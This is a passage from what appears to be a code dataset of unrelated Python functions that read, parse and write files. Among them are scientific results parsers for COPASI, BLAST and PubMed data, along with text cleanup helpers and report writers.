sys.exit(\"Error cannot open {0}\".format(output_file))", "def print_solutions(file_):\n with open(file_, 'r') as inp:\n for line in inp:\n print(line[:-5] + str(process_line(line)))", "def read_output(infile):\n global results\n results = []\n for line in infile:\n if line[0] == '#':\n continue\n fields = line.split()\n results.append((int(fields[0]), float(fields[1]), int(fields[2]), fields[3]))", "def turn_files_into_pretty_text(text_files):\n list_of_all_lines = []\n for item in text_files:\n for line in item:\n line = line.rstrip()\n if line not in list_of_all_lines:\n list_of_all_lines.append(line)\n\n for item in list_of_all_lines:\n\n words = item.split('|')\n melon = words[0]\n count = words[1]\n amount = words[2]\n\n print \"Delivered {} {}s for total of ${}\".format(count, melon, amount)", "def file_read(self):\r\n with open(self.source_text_path, 'r') as myfile:\r\n data = myfile.read() \r\n comments = re.compile(r'''\r\n (//[^\\n]*(?:\\n|$)) # Everything between // and the end of the line/file\r\n | # or \r\n (/\\*.*?\\*/) # Everything between /* and */\r\n |\r\n \\/\\*[\\s\\S]*?\\*\\/|([^:]|^)\\/\\/.*$ # Every comment between /** and */ \r\n ''', re.VERBOSE)\r\n self.modified_source_text = comments.sub('\\n', data) \r\n return self.modified_source_text", "def process_pr_results(self, results_files, custom_report):\n \n\n \n output_file = open(os.path.join(self.path, 'raw_results.txt'), 'w')\n \n #Keep track of the last read line before a newline; this will be the best value from an optimization run\n last_line = ''\n #Match a string of the format ( 0.0995749 0.101685 0.108192 0.091224 ) 0.091224 0 100\n #Contains parameter values, the best optimization value, the cpu time, and some other values, e.g. particle numbers that Copasi likes to add. These could be removed, but they seem useful.\n output_string = r'.*\\(\\s(?P<params>.+)\\s\\)\\s+(?P<best_value>\\S+)\\s+(?P<cpu_time>\\S+)\\s+(?P<function_evals>\\S+)\\.*'\n output_re = re.compile(output_string)\n \n best_value = None\n best_line = None\n \n #Copy the contents of the first file to results.txt\n for line in open(os.path.join(self.path, results_files[0]), 'r'):\n output_file.write(line)\n try:\n if line != '\\n':\n if output_re.match(line):\n current_value = float(output_re.match(line).groupdict()['best_value'])\n if best_value != None:\n if current_value < best_value:\n best_value = current_value\n best_line = line\n elif best_value == None:\n best_value = current_value\n best_line = line\n else:\n pass\n except Exception as e:\n if custom_report:\n pass\n else:\n raise e\n \n #And for all other files, copy everything but the last line\n for filename in results_files[1:]:\n firstLine = True\n for line in open(os.path.join(self.path, filename), 'r'):\n if not firstLine:\n output_file.write(line)\n try:\n if line != '\\n':\n if output_re.match(line):\n current_value = float(output_re.match(line).groupdict()['best_value'])\n if current_value < best_value:\n best_value = current_value\n best_line = line\n else:\n pass\n except Exception as e:\n if custom_report:\n pass\n else:\n raise e\n firstLine = False\n \n \n output_file.close()\n \n #Write the best value to results.txt\n output_file = open(os.path.join(self.path, 'results.txt'), 'w')\n \n output_file.write('Best value\\tCPU time\\tFunction evals\\t')\n \n for parameter in self.get_parameter_estimation_parameters():\n\n output_file.write(parameter[0].encode('utf8'))\n output_file.write('\\t')\n output_file.write('\\n')\n\n best_line_dict = output_re.match(best_line).groupdict()\n\n output_file.write(best_line_dict['best_value'])\n output_file.write('\\t')\n output_file.write(best_line_dict['cpu_time'])\n output_file.write('\\t')\n output_file.write(best_line_dict['function_evals'])\n output_file.write('\\t')\n \n for parameter in best_line_dict['params'].split('\\t'):\n output_file.write(parameter)\n output_file.write('\\t')\n output_file.close()\n \n if best_value != None:\n return True\n else:\n return False", "def main():\n summary = dict()\n gba_file = open('gettysburg.txt', 'r')\n for line in gba_file:\n Process_line(line, summary)\n Pretty_print(summary)", "def reduce_to_readable(medlinefile, pmids, resultfile=\"pubmed_result2.txt\"):\n num = 1\n with open(resultfile, 'w') as f:\n for pmid, dp, ti, ab in parser(medlinefile):\n ab = \"\\n\".join(textwrap.wrap(ab, width=85))\n ti = \"\\n\".join(textwrap.wrap(ti, width=85))\n if pmid in pmids:\n f.write(\"PMID: {}, {}\\n{}. {}\\n\\n{}\\n\\n\".format(\n pmid, dp, num, ti, ab))\n num += 1", "def finalize_result(self):\n logging.debug(\"finalize_result()\")\n with open(self.html_file, \"a\") as result_file:\n result_file.write(\"<br/>Analyzis successful\")\n with open(self.txt_file, \"a\") as result_file:\n result_file.write(\"Analyzis successful\")", "def combine_modeloutputs(outputname='xxRENAMExx_Zcombined.txt',\n data='sfr',\n verbose=True):\n if data == 'sfr':\n filepath = '/Users/kschmidt/work/catalogs/NEOGALlines/nebular_emission/'\n modelfilestr = filepath+'nebular_emission_Z0*.txt'\n splitstr = 'emission_Z'\n elif data == 'agn':\n filepath = '/Users/kschmidt/work/catalogs/NEOGALlines/AGN_NLR_nebular_feltre16/'\n modelfilestr = filepath+'nlr_nebular_Z0*.txt'\n splitstr = 'nebular_Z'\n else:\n sys.exit('Inavlid value of data=\"'+data+'\"')\n\n output = filepath+outputname\n if verbose: print(' - Setting up output for:\\n '+output)\n modelfiles = glob.glob(modelfilestr)\n header = open(modelfiles[0]).readline().rstrip()\n if data == 'sfr':\n header = header.replace('##','# Zgas ')\n elif data == 'agn':\n header = header.replace('#','# Zgas ')\n header = header+'\\n'\n\n fout = open(output, 'w')\n fout.write(header)\n if verbose: print(' - Writing the following files to ouput:')\n for mf in modelfiles:\n if verbose: print(' '+mf)\n Zgasstring = mf.split('/')[-1].split(splitstr)[-1].split('.txt')[0]\n\n with open(mf, 'r') as f:\n linesall = f.readlines()\n\n for linestring in linesall:\n if linestring.startswith('#'):\n pass\n elif linestring == ' \\n':\n fout.write(linestring)\n else:\n fout.write('0.'+Zgasstring+' '+linestring)\n\n fout.close()", "def write_results_to_disk(self, result_path,results):\n with open(result_path+\"/results.txt\",\"w+\") as out:\n\n for query_num in results:\n for doc_num in results[query_num]:\n out.write(str(query_num)+\" 0 \"+doc_num+\" 1 42.38 mt\\n\")\n out.close()", "def write_to_file(self, results):\n with open(self.outputFilename, \"w\") as csvFile:\n csvWriter = csv.writer(csvFile, delimiter=',') \n title_row = ('asset_id', 'component_id', 'latitude', 'longitude', 'installation_date', 'commissioning_date', 'street_name', 'cabinet_id', 'nominal_wattage', 'current_time', 'current_LogValue', 'current_IsLogValueOff') \n csvWriter.writerow(title_row)\n for record in results:\n csvWriter.writerow(record)", "def joinRows(r1,r2,outfname):\n outf = open(outfname,'w')\n f1 = file(r1,'r')\n f2 = file(r2,'r')\n for row1 in f1:\n if row1.strip() > '':\n row2 = f2.next()\n outf.write('%s%s\\n' % (row1.strip(),row2.strip()))\n outf.close()", "def concatenate_files(file_one, file_contents, file_headers, output_file):\n with open(file_one, 'r') as input_file:\n with open(output_file, 'w') as output_file:\n for index, line in enumerate(input_file):\n line = line.strip()\n if index == 0:\n write_header(output_file, line, file_headers)\n else:\n if not write_gene_line(output_file, line, file_contents):\n write_zero_expression(output_file, file_contents, line)", "def main():\n in_file_name = \"input.txt\"\n out_file_name = \"output.txt\"\n\n in_file = open(in_file_name, 'r')\n\n out_file = open(out_file_name, 'w')\n out_file.write('IlgizZamaleev' + '\\n')\n\n problems = int(in_file.readline())\n\n for i in range(problems):\n automato = Parser().parse_automata(in_file)\n\n tests = int(in_file.readline())\n\n out_file.write(str(i + 1) + '\\n')\n\n for j in range(tests):\n word = in_file.readline()[:-1]\n out_file.write(automato.check_word(word) + '\\n')\n\n in_file.close()\n out_file.close()", "def combine(args, library_sizes):\n with open(args.counts, \"r\") as counts, open(args.results, \"r\") as results:\n with open(args.output_dir + \"counts_results.txt\", \"w+\") as file1, \\\n open(args.output_dir + \"counts_results_rpm.txt\",\"w+\") \\\n as file2, \\\n open(args.output_dir + \"counts_results_rpkm.txt\", \"w+\") \\\n as file3:\n head = True\n for count_line, results_line in zip(counts, results):\n count_line = count_line.strip()\n results_line = results_line.strip()\n\n if head: # Process column names into one header\n head = False\n count_head_parts = count_line.split(\"\\t\")\n results_head_parts = results_line.split(\"\\t\")\n results_head_parts = [\"Chromosome\", \"Start\", \"End\"] + \\\n results_head_parts[1:]\n\n new_head_parts = results_head_parts + \\\n count_head_parts[2:]\n new_head = \"\\t\".join(new_head_parts)\n new_head += \"\\n\"\n file1.write(new_head)\n file2.write(new_head)\n file3.write(new_head)\n\n else:\n process(count_line, results_line,\n file1, file2, file3, library_sizes)", "def dumpText(self,textFileName):\n textFile = file(textFileName,'wb')\n for script in sorted(self.scripts, key=lambda a: a.id.lower()):\n textFile.write('# %s %s\\r\\n' % (script.id,'='*(76 - len(script.id))))\n textFile.write(script.sctx.data.strip())\n textFile.write('\\r\\n\\r\\n')\n textFile.close()", "def extract_text(infile):\n # Get text from mudraw\n text = subprocess.check_output(['mudraw', '-F', 'txt', infile])\n\n # Cleanup raw text\n match = re.search(\n r'.*?Activity \\/ Remarks(?P<table1>.*?)Activities not shown on the ' +\n r'DABS Chart Side:.*?Activity \\/ Remarks(?P<table2>.*?)For detailed ' +\n r'information regarding the DABS',\n text,\n re.MULTILINE | re.DOTALL)\n if not match:\n raise ExtractionError('Could not extract text from PDF.')\n false_or_none_string = lambda x: bool(x) and x.lower() != 'none'\n data = '\\n\\n\\n'.join(match.groups())\n raw_parts = re.sub(r'\\n[ \\t]+\\n', '\\n\\n', data).split('\\n\\n\\n')\n parts = filter(false_or_none_string, map(lambda x: x.strip(), raw_parts))\n\n # Write CSV\n headers = (\n b'Firing-Nr\\nD-/R-Area\\nNOTAM-Nr',\n b'Validity UTC',\n b'Lower Limit\\nAMSL or FL',\n b'Upper Limit\\nAMSL or FL',\n b'Location',\n b'Center Point',\n b'Covering Radius',\n b'Activity / Remarks',\n )\n rows = []\n for i, part in enumerate(parts):\n # Regexes\n multiple_newlines_re = re.compile(r'\\n+')\n height_re = re.compile(r'(GND|[0-9]+m \\/ [0-9]+ft|FL[0-9]{2,3}|REF AIP)')\n center_radius_re = re.compile(r'([0-9]{6}N [0-9]{7}E)\\s+?(.*?NM)')\n\n # Separate columns (warning: hackish code ahead!)\n row = {}\n step1 = re.split(r'([0-2][0-9][0-6][0-9] - [0-2][0-9][0-6][0-9])', part)\n row['nr'] = step1[0].strip()\n timestring = '\\n'.join(step1[1:-1])\n row['validity'] = multiple_newlines_re.sub('\\n', timestring)\n step2 = filter(None, height_re.split(step1[-1].strip()))\n row['lower'] = step2[0]\n row['upper'] = step2[2]\n step3 = filter(None, center_radius_re.split(step2[-1].strip()))\n row['location'] = step3[0].strip()\n row['center'] = step3[1].strip()\n row['radius'] = step3[2].strip()\n row['activity'] = multiple_newlines_re.sub('\\n', step3[3].strip())\n\n # Add to list of rows\n rows.append((\n row['nr'].encode('utf8'),\n row['validity'].encode('utf8'),\n row['lower'].encode('utf8'),\n row['upper'].encode('utf8'),\n row['location'].encode('utf8'),\n row['center'].encode('utf8'),\n row['radius'].encode('utf8'),\n row['activity'].encode('utf8'),\n ))\n\n return tablib.Dataset(*rows, headers=headers)", "def write_results(filename, algorithm_name, qty_array, min_coins):\n with open(filename, 'a') as f:\n f.write('{0}\\n'.format(algorithm_name))\n f.write('{0}\\n'.format(qty_array))\n f.write('{0}\\n'.format(min_coins))", "def extract_comments(comments_file, output_filename=direc+\"/comments.txt\"):\r\n if not os.path.exists(output_filename.split(\"/\")[0]):\r\n os.makedirs(output_filename.split(\"/\")[0])\r\n\r\n print(\"Extracting comments from \" + comments_file + \"...\")\r\n comments_dict = {}\r\n with open(output_filename, \"w\", encoding=encoding) as f:\r\n current = 0\r\n for event, child in iterparse(comments_file, events=('start', 'end')):\r\n if current > SAMPLE_SIZE:\r\n break\r\n elif len(child.attrib) > 0 and event == \"start\":\r\n if child.attrib['PostId'] not in comments_dict:\r\n comments_dict[child.attrib['PostId']] = []\r\n comments_dict[child.attrib['PostId']].append(child.attrib['Id'])\r\n clean_comment = clean_markdown(child.attrib['Text'])\r\n line = child.attrib['Id'] + \"\\t\" + child.attrib['PostId'] + \"\\t\" + clean_comment + \"\\t\" + child.attrib['Score'] + \"\\n\"\r\n f.write(line)\r\n\r\n current += 1\r\n print_progress(current, SAMPLE_SIZE)\r\n print(\"\\nFinished extracting comments from \" + comments_file + \".\\n\")\r\n return comments_dict", "def _clear_temp_results(self):\n with open(self._filename, \"w\") as f_out:\n f_out.write(self._delimiter.join(self._get_fields()))\n f_out.write(\"\\n\")", "def print_results():\n # Define 2 files, one for reading binary numbers and the other for writing the results\n file_reader = open('../python-code/binary.txt', 'r')\n file_writer = open('../results.txt', 'w')\n # Read the first 3 values in the file, they are number of t and x variables and if the data is 64 bit\n is_64bit = int(file_reader.readline(), 2)\n number_of_t = int(file_reader.readline(), 2)\n number_of_x = int(file_reader.readline(), 2)\n\n # Loop on every t\n for t in range(number_of_t):\n result = file_reader.readline()\n # If the data is 64 bit then the next line is the 32 MSBs so parse them with the result\n if is_64bit == 1:\n result = file_reader.readline()[:-1] + result\n result = int(result, 2)\n file_writer.write(\"T\" + str(t) + \": \" + str(result))\n # Loop on every x\n for x in range(number_of_x):\n result = file_reader.readline()\n # If the data is 64 bit then the next line is the 32 MSBs so parse them with the result\n if is_64bit == 1:\n result = file_reader.readline()[:-1] + result\n result = int(result, 2)\n file_writer.write(\"\\tX\" + str(x) + \": \" + str(result))\n file_writer.write(\"\\n\")", "def findDocumentsThree():\n lineTwo = 0\n counterTwo = 0\n\n with open('bc.processed3.csv', 'r') as readfile,\\\n open('documentsThree.txt', 'w') as writefile:\n for line in readfile:\n lineTwo += 1\n if re.match('^<document', line):\n counterTwo += 1\n writefile.write(str(counterTwo) + '\\t' +\n str(lineTwo) + '\\t' + line)\n\n divided2 = counterTwo / 2\n lines2 = lineTwo / 2\n writefile.write('\\n' + '--------------------------------' + '\\n')\n writefile.write('divided2: ' + str(divided2) + '\\n')\n writefile.write('lines divided by 2: ' + str(lines2) + '\\n')\n writefile.write('--------------------------------' + '\\n')\n writefile.write('1: ' + '1\\n')\n writefile.write('2: ' + str(lines2))\n print('divided2: ' + str(divided2))\n print('lines divided by 2: ' + str(lines2))", "def readOptimizationResultsFile(self):\n requiredLineNo = 0\n self.createParamters()\n \n self.optimizationResultsFile = open(self.fileName, 'r')\n \n for lineIndex, line in enumerate(self.optimizationResultsFile):\n if lineIndex == 0:\n startingPhase1, startingPhase2 = line.split()\n self.startingPhase1, self.startingPhase2 = int(startingPhase1), int(startingPhase2)\n\n elif lineIndex == 1:\n init1, init2, elapsedGreen1, elapsedGreen2 = line.split()\n self.init1, self.init2 = float(init1), float(init2)\n\n elif lineIndex == 2:\n self.processPhaseDuration(line, self.leftCriticalPointsRing1, self.leftCriticalPointsRing2)\n self.processPhaseSequence()\n\n elif lineIndex == 3:\n self.processPhaseDuration(line, self.leftCriticalPointsRing1, self.leftCriticalPointsRing2)\n self.processPhaseSequence()\n\n elif lineIndex == 4:\n self.processPhaseDuration(line, self.leftCriticalPointsRing1, self.leftCriticalPointsRing2)\n self.processPhaseSequence()\n\n elif lineIndex == 5:\n self.processPhaseDuration(line, self.rightCriticalPointsRing1, self.rightCriticalPointsRing2)\n\n elif lineIndex == 6:\n self.processPhaseDuration(line, self.rightCriticalPointsRing1, self.rightCriticalPointsRing2)\n\n elif lineIndex == 7:\n self.processPhaseDuration(line, self.rightCriticalPointsRing1, self.rightCriticalPointsRing2)\n\n elif lineIndex == 14:\n noOfRequest = int(line)\n requiredLineNo = 15 + noOfRequest\n # break\n \n elif lineIndex >=15 and lineIndex < requiredLineNo:\n self.getPriorityRequests(line)\n \n elif lineIndex >=15 and lineIndex >= requiredLineNo:\n break\n # self.optimizationResultsFile = open(self.fileName, 'r')\n # for i, line in enumerate(self.optimizationResultsFile):\n # if i in range(15, requiredLineNo):\n\n self.optimizationResultsFile.close()\n # self.getPriorityRequests(requiredLineNo)\n \n self.getCummulativeValues()\n self.generateTimePhaseDiagram()", "def write_results(gold, pred, ratings, text):\n\n f = open(\"results.txt\", \"w\")\n for g, p, r, t in zip(gold, pred, ratings, text):\n f.write(\"%d\\t%d\\t%d\\t%s\\n\" % (g,p,r,t))\n\n f.close()", "def parsePlanOutput(outputFile, testTempFile):\n status = False\n outputFileRead = open(outputFile, \"r\") \n for line in outputFileRead.readlines():\n if re.search(\"Objects \\*{25}\", line) != None:\n status = True\n if status:\n testTempFile.write(line)\n if status == False:\n sys.stderr.write(\"Warning: Expected Output file content not found\")\n outputFileRead.close()", "def main():\n # get_history_using_HTTP()\n # merge_files()\n # remove_lines()\n remove_duplicated_lines()", "def write_coord_seq():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n lis = []\n with open(filepath, 'r') as file:\n for line in file:\n if line[:4] == 'ATOM':\n line_split = line.split()\n lis.append(line_split[3:4])\n choice1 = input('Enter name for the output file: ')\n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(filepath1, 'w') as myfile:\n for i in lis:\n myfile.writelines(i)\n print('Done!')\n \n with open(choice, 'r') as myfile:\n header = ''\n for line in myfile:\n if line.startswith(\"TITLE\"): \n head_split = line.split()\n header = header + ' '.join(head_split[1:])\n \n choice2 = input('Enter output file name with a .fasta extension: ')\n filepath2 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice2)\n z = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(z, 'r') as file:\n with open(filepath2, 'w') as output:\n for i in file:\n output.writelines('>' + header + '\\n' + i)\n print('>' + header + '\\n' + i)\n print('Fasta file generated!')", "def print_results(args):\n min_comics, filename = args\n with codecs.open(filename, 'a', 'utf-8') as fp:\n for name, shortname in sorted(load_result(json_file).items()):\n if name in exclude_comics:\n continue\n fp.write(u\"add(%r, %r)\\n\" % (\n str(truncate_name(name)), str(shortname))\n )", "def lines(filename, exclude_imports=True, exclude_comments=True, exclude_tests=True, exclude_globals=True, exclude_blank=True, verbose=False, is_c=False, s=None):\n if s is None:\n s = open(filename, 'rt').read()\n\n L = s.split('\\n')\n \n # Hack to strip out triple and single quote string lines in a heuristic (unreliable) way, which avoids parsing Cython\n if not is_c:\n for i in range(len(L)):\n if L[i].strip().startswith(\"'\") and L[i].strip().endswith(\"'\"):\n L[i] = ''\n i = 0\n while i < len(L):\n found = False\n for triple_quote in ['\"\"\"', \"'''\"]:\n if L[i].strip().startswith(triple_quote):\n L[i] = L[i].strip()[3:]\n for j in range(i, len(L)):\n if triple_quote in L[j]:\n found = True\n L[j] = ''\n if found:\n break\n i = j+1\n if not found:\n i += 1\n else:\n begin_comment = '/*'\n end_comment = '*/'\n i = 0\n while i < len(L):\n found = False\n if begin_comment in L[i]:\n rest = L[i][L[i].index(begin_comment)+len(begin_comment):]\n L[i] = L[i][:L[i].index(begin_comment)]\n if end_comment in rest:\n found = True\n i += 1\n else:\n for j in range(i+1, len(L)):\n if end_comment in L[j]:\n found = True\n L[j] = L[j][L[j].index(end_comment)+len(end_comment):]\n else:\n L[j] = ''\n if found:\n break\n i = j + 1\n if not found:\n i += 1\n\n# util.print_header('Lines before exclude_tests:' + filename, '\\n'.join(L))\n\n # Hack to strip out def test() and other methods in a heuristic (unreliable) way, which avoids parsing Cython\n if exclude_tests:\n # Also exclude makeColorMatrix so that our camera pipe is apples-to-apples comparable with reported lines in Halide paper\n if not is_c:\n methods = 'test run_test_all mandelbrot_gray mandelbrot_color composite_numpy composite_numexpr makeColorMatrix'.split()\n else:\n methods = ['int main', 'void main']\n i = 0\n while i < len(L):\n L_i_strip = L[i].strip()\n if ((not is_c and (any(L_i_strip.startswith('def ' + method) for method in methods) or\n any(L_i_strip.startswith('cdef ' + method) for method in methods))) or\n (is_c and (any(L_i_strip.startswith(method) for method in methods)))):\n L[i] = ''\n for j in range(i+1, len(L)):\n L_j_strip = L[j].strip()\n c_ok = True\n if is_c:\n c_ok = L_j_strip != '{' and L_j_strip != '}'\n if not L[j].startswith(' ') and not L[j].startswith('\\t') and not len(L[j].strip()) == 0 and c_ok:\n break\n else:\n L[j] = ''\n i = j\n elif (L[i].strip().startswith('test(') or L[i].strip().startswith('run_test_all(')) and not is_c:\n L[i] = ''\n i += 1\n else:\n i += 1\n\n# util.print_header('Lines before exclude_imports:' + filename, '\\n'.join(L))\n if exclude_imports:\n if not is_c:\n L = [x for x in L if not x.lstrip().startswith('import') and not x.lstrip().startswith('cimport') and not x.startswith('cdef extern')]\n else:\n L = [x for x in L if not x.lstrip().startswith('#include')]\n# util.print_header('Lines before exclude_comments:' + filename, '\\n'.join(L))\n if exclude_comments:\n if not is_c:\n L = [x for x in L if not x.lstrip().startswith('#') and not x.strip() == 'pass']\n else:\n L = [x for x in L if not x.lstrip().startswith('//')]\n# util.print_header('Lines before exclude_globals:' + filename, '\\n'.join(L))\n if exclude_globals and not is_c:\n L = [x for x in L if (x.startswith(' ') or x.startswith('\\t') or x.startswith('def') or x.startswith('cdef')) and (not x.lstrip().startswith('has_'))]\n# util.print_header('Lines before exclude_blank:' + filename, '\\n'.join(L))\n\n if is_c:\n # Also exclude makeColorMatrix so that C camera pipe is apples-to-apples comparable with reported lines in Halide paper\n L = [x for x in L if not x.lstrip().startswith('matrix_3200') and not x.lstrip().startswith('matrix_7000')]\n if exclude_blank:\n L = [x for x in L if not len(x.strip()) == 0]\n\n if verbose:\n util.print_header('Final lines for:' + filename, '\\n'.join(L))\n\n return len(L)", "def read_file(self, file):\n buffer = ''\n for line in file.readlines():\n line = line.strip()\n if not line.startswith('#'):\n buffer += ' ' + line\n return buffer", "def findDocumentsTwo():\n lineTwo = 0\n counterTwo = 0\n\n with open('bc.processed2.csv', 'r') as readfile,\\\n open('documentsTwo.txt', 'w') as writefile:\n for line in readfile:\n lineTwo += 1\n if re.match('^<document', line):\n counterTwo += 1\n writefile.write(str(counterTwo) + '\\t' +\n str(lineTwo) + '\\t' + line)\n\n divided4 = counterTwo / 4\n lines4 = lineTwo / 4\n writefile.write('\\n' + '--------------------------------' + '\\n')\n writefile.write('divided4: ' + str(divided4) + '\\n')\n writefile.write('lines divided by 4: ' + str(lines4) + '\\n')\n writefile.write('--------------------------------' + '\\n')\n writefile.write('1: ' + '1\\n')\n writefile.write('2: ' + str(lines4) + '\\n')\n writefile.write('3: ' + str((lines4 * 2)) + '\\n')\n writefile.write('4: ' + str((lines4 * 3)))\n print('divided4: ' + str(divided4))\n print('lines divided by 4: ' + str(lines4))", "def main():\n outfile = 'result.txt'\n\n if os.path.exists(outfile):\n os.remove(outfile)\n\n for arg in sys.argv[1:]:\n get_info(arg, outfile)", "def main(argv):\r\n\r\n def log_error(s):\r\n sys.stderr.write(s)\r\n sys.stderr.write('\\n')\r\n def log(s):\r\n pass\r\n\r\n global TEXT_INCLS\r\n TEXT_INCLS = []\r\n\r\n command = os.path.split(argv[0])[1]\r\n params = {}\r\n cpt_char = None\r\n comments = False\r\n\r\n #Extract options\r\n try:\r\n opts, args = getopt.getopt(\r\n argv[1:],\r\n \"c:a:t:r:A:V:R:o:vmh\",\r\n [\"title-char=\",\r\n \"table-attributes=\", \"table-header=\", \"row-pattern=\",\r\n \"view-table-attributes=\", \"view-header=\", \"view-row-pattern=\",\r\n \"output=\", \"verbose\", \"comments\", \"help\"])\r\n\r\n infile = args and args[0] or None\r\n outfile = infile and \"%s.asciidoc\" % os.path.splitext(os.path.split(infile)[1])[0] or '-'\r\n\r\n except getopt.GetoptError, err:\r\n log_error(main.__doc__ % locals())\r\n log_error(\"Error: %s\" % err)\r\n return -2\r\n except IndexError, err:\r\n log_error(main.__doc__ % locals())\r\n log_error(\"Error: File not specified.\")\r\n return -2 \r\n\r\n \r\n for o, a in opts:\r\n if o in (\"-c\", \"--title-char\"):\r\n a = a.strip()\r\n if len(a) > 1:\r\n cpt_char = a[0]\r\n params['title_char'] = a[1]\r\n else:\r\n params['title_char'] = a\r\n elif o in (\"-v\", \"--verbose\"):\r\n log = log_error\r\n elif o in (\"-o\", \"--output\"):\r\n outfile = a\r\n elif o in (\"-m\", \"--comments\"):\r\n comments = True\r\n elif o in (\"-h\", \"--help\"):\r\n print main.__doc__ % locals()\r\n return 0\r\n\r\n if outfile=='-':\r\n outfile = None\r\n\r\n if comments:\r\n log(\"Generating SQL COMMENTS from SQL\")\r\n log(\"================================\")\r\n else:\r\n log(\"Generating ASCIIDOC from SQL\")\r\n log(\"============================\")\r\n\r\n try:\r\n # Read SQL\r\n log(\"Reading file %s ...\" % infile)\r\n f = infile and open(infile) or sys.stdin\r\n sql = f.read()\r\n f.close()\r\n\r\n if comments:\r\n ret = objects_to_comments(sql)\r\n else:\r\n ret = TOP_COMMENT\r\n\r\n if cpt_char:\r\n ret += \"\\n\\n%s\\n%s\\n\" % (TABLES_CPT, cpt_char*len(TABLES_CPT))\r\n\r\n # Parse Tables from SQL\r\n log(\"Parsing Tables...\")\r\n ret += tables_to_asciidoc(sql, **params)\r\n\r\n if cpt_char:\r\n # Parse Views from SQL\r\n vws = views_to_asciidoc(sql, **params)\r\n log(\"Parsing Views...\")\r\n if vws.strip():\r\n ret += \"\\n\\n%s\\n%s\\n\" % (VIEWS_CPT, cpt_char*len(VIEWS_CPT))\r\n ret += vws\r\n \r\n\r\n # Making title references\r\n ret = asciidoc.make_title_references(ret)\r\n \r\n # Making text inclusions of the Views\r\n for i in range(len(TEXT_INCLS)):\r\n ret = ret.replace(\"INCLUSION_%d\" % i, TEXT_INCLS[i])\r\n\r\n # Write SQL\r\n log(\"Writing file %s ...\" % outfile)\r\n f = outfile and open(outfile, \"w\") or sys.stdout\r\n f.write(ret)\r\n f.close()\r\n\r\n log(\"Done!\")\r\n \r\n except Exception,err:\r\n log_error(\"Error: %s\" % err)\r\n raise\r\n\r\n log(\"\")\r\n return 0", "def write_result(file_name, name, entries, extra_includes, src_file_names):\r\n\r\n with open(file_name, 'w', newline='\\n') as f:\r\n f.write('// Generated by %s\\n' % os.path.basename(__file__))\r\n f.write('// Based on %s: %s\\n' %\r\n ((\"this file\" if len(src_file_names) < 2 else\r\n \"these files\"), \", \".join(src_file_names)))\r\n methods = entries[0]\r\n if len(methods) != 0:\r\n f.write(to_PyMethodDef(name, methods, extra_includes))\r\n f.write('\\n')\r\n\r\n properties = entries[1]\r\n if len(properties) != 0:\r\n f.write('\\n')\r\n f.write(to_PyGetSetDef(name, properties))", "def summarize_end(sample):\n (species, sex, tissue, replicate) = sample.split(\"_\")\n ins = FocalIntersect(species, sex, tissue, replicate)\n with open(\"../data/output/\" + ins.name + \".end.A.txt\", 'w') as f:\n for isoseqid in ins.end_infoA.keys():\n exonnum1, exonnum2, five_desc, three_desc = ins.end_infoA[isoseqid]\n transid = ins.isoseqid2besttransidA[isoseqid]\n f.write(isoseqid + \"\\t\" + transid + \"\\t\" + exonnum1 + \"\\t\" + exonnum2 + \"\\t\" + five_desc + \"\\t\" + three_desc + \"\\n\")\n\n with open(\"../data/output/\" + ins.name + \".end.B.txt\", 'w') as f:\n for isoseqid in ins.end_infoB.keys():\n exonnum1, exonnum2, five_desc, three_desc = ins.end_infoB[isoseqid]\n transid = ins.isoseqid2besttransidB[isoseqid]\n f.write(isoseqid + \"\\t\" + transid + \"\\t\" + exonnum1 + \"\\t\" + exonnum2 + \"\\t\" + five_desc + \"\\t\" + three_desc + \"\\n\")", "def start_queryResult_generator(inFile, fDic, work_sheet):\n \"\"\" http://biopython.org/DIST/docs/api/Bio.SearchIO.BlastIO-module.html\"\"\"\n qGenerator = SearchIO.parse(inFile, 'blast-xml')\n max_hits = 0\n query_count = 1\n # Step through all the records in the lump xml data file and write out\n # each separate hit to file. Also write the summary information to the\n # work sheet.\n for query_result in qGenerator:\n print('Processing Query BLAST return ' + str(query_count))\n number_hits = int(len(query_result.hits))\n # Extend header out right if new MAXHITS\n if number_hits > max_hits:\n max_hits = number_hits \n if number_hits == 0:\n # Construct path plus file name for no hit query\n filename = str(fDic['topDir'] + fDic['noHit'] + 'Query_' \n + str(query_count) + '_H_none.xml')\n # Write out any Queries that had to hits to a no Hit subfolder\n SearchIO.write(query_result, filename, 'blast-xml')\n write_qr_to_ws(query_count, query_result, work_sheet)\n else :\n # Now set up a counter of 'hits' in the QueryResult so hit's\n # can be sliced away into their own record cleanly.\n hit_count = 0;\n for hit in query_result.hits:\n total_hsps = len (hit.hsps)\n lowest_eval = hit.hsps[0].evalue\n best_hsp = hit.hsps[0]\n for hsp in hit.hsps:\n if hsp.evalue < lowest_eval:\n lowest_eval = hsp.evalue\n best_hsp = hsp\n filename = str(fDic['topDir'] + outputFileName(query_count, hit, best_hsp))\n SearchIO.write(query_result[hit_count:(hit_count + 1)], filename , 'blast-xml')\n hit_count += 1\n # Write out query_result to worksheet \n write_qr_to_ws(query_count, query_result, work_sheet)\n query_count += 1\n # break is debugging code\n # if query_count == 20:\n # break\n build_ws_header(work_sheet, max_hits)\n return qGenerator", "def process_or_results(self, filenames):\n \n #Check if we're maximising or minimising\n optTask = self._getTask('optimization')\n problem = optTask.find(xmlns + 'Problem')\n for parameter in problem:\n if parameter.attrib['name']=='Maximize':\n max_param = parameter.attrib['value']\n if max_param == '0':\n maximize = False\n else:\n maximize = True\n \n output_file = open(os.path.join(self.path, 'raw_results.txt'), 'w')\n \n\n #Match a string of the format ( 0.0995749 0.101685 0.108192 0.091224 ) 0.091224 0 \n #Contains parameter values, the best optimization value, the cpu time, and some other values.\n output_string = r'\\(\\s(?P<params>.+)\\s\\)\\s+(?P<best_value>\\S+)\\s+(?P<cpu_time>\\S+)\\.*'\n output_re = re.compile(output_string)\n \n best_value = None\n best_line = None\n \n #Copy the contents of the first file to results.txt\n for line in open(os.path.join(self.path, filenames[0]), 'r'):\n output_file.write(line)\n if line != '\\n':\n if output_re.match(line):\n value = float(output_re.match(line).groupdict()['best_value'])\n if best_value != None and maximize:\n if value > best_value:\n best_value = value\n best_line = line\n elif best_value != None and not maximize:\n if value < best_value:\n best_value = value\n best_line = line\n elif best_value == None:\n best_value = value\n best_line = 